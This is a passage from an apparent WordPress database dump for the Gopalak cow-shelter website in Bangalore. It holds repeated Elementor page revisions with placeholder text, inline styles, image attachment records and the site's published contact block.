/></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:05:12','2022-10-10 11:35:12','',1373,'https://gopalak.in/?p=1561',0,'revision','',0),(1562,1,'2022-10-10 17:05:12','2022-10-10 11:35:12','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:05:12','2022-10-10 11:35:12','',1373,'https://gopalak.in/?p=1562',0,'revision','',0),(1563,1,'2022-10-10 17:05:12','2022-10-10 11:35:12','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:05:12','2022-10-10 11:35:12','',1373,'https://gopalak.in/?p=1563',0,'revision','',0),(1564,1,'2022-10-10 17:06:37','2022-10-10 11:36:37','','depositphotos_12743475-stock-photo-farm-cattle (1)','','inherit','open','closed','','depositphotos_12743475-stock-photo-farm-cattle-1','','','2022-10-10 17:06:37','2022-10-10 11:36:37','',0,'https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle-1.webp',0,'attachment','image/webp',0),(1565,1,'2022-10-10 17:06:39','2022-10-10 11:36:39','','download (7) (1)','','inherit','open','closed','','download-7-1','','','2022-10-10 17:06:39','2022-10-10 11:36:39','',0,'https://gopalak.in/wp-content/uploads/2022/10/download-7-1.jpg',0,'attachment','image/jpeg',0),(1566,1,'2022-10-10 17:06:42','2022-10-10 11:36:42','','download (8) (1)','','inherit','open','closed','','download-8-1','','','2022-10-10 17:06:42','2022-10-10 11:36:42','',0,'https://gopalak.in/wp-content/uploads/2022/10/download-8-1.jpg',0,'attachment','image/jpeg',0),(1567,1,'2022-10-10 17:06:44','2022-10-10 11:36:44','','depositphotos_12743475-stock-photo-farm-cattle','','inherit','open','closed','','depositphotos_12743475-stock-photo-farm-cattle','','','2022-10-10 17:06:44','2022-10-10 11:36:44','',0,'https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp',0,'attachment','image/webp',0),(1568,1,'2022-10-10 17:06:47','2022-10-10 11:36:47','','download (7)','','inherit','open','closed','','download-7','','','2022-10-10 17:06:47','2022-10-10 11:36:47','',0,'https://gopalak.in/wp-content/uploads/2022/10/download-7.jpg',0,'attachment','image/jpeg',0),(1569,1,'2022-10-10 17:06:49','2022-10-10 11:36:49','','download (8)','','inherit','open','closed','','download-8','','','2022-10-10 17:06:49','2022-10-10 11:36:49','',0,'https://gopalak.in/wp-content/uploads/2022/10/download-8.jpg',0,'attachment','image/jpeg',0),(1571,1,'2022-10-10 17:08:20','2022-10-10 11:38:20','','adopt','','inherit','open','closed','','adopt','','','2022-10-10 17:08:20','2022-10-10 11:38:20','',0,'https://gopalak.in/wp-content/uploads/2022/10/adopt.jpg',0,'attachment','image/jpeg',0),(1574,1,'2022-10-10 17:14:34','2022-10-10 11:44:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:14:34','2022-10-10 